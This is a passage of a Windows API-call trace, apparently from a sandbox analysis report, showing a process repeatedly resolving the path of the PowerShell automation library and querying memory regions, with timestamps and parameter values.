lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.880] GetLastError () returned 0x0 [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.881] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.881] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.881] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.882] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.882] GetLastError () returned 0x0 [0089.882] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.882] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.883] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.883] GetLastError () returned 0x0 [0089.883] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.884] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.884] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.884] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.885] VirtualQuery (in: lpAddress=0x13d214, lpBuffer=0x13e214, dwLength=0x1c | out: lpBuffer=0x13e214*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.885] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.886] GetLastError () returned 0x0 [0089.886] GetFullPathNameW (in: 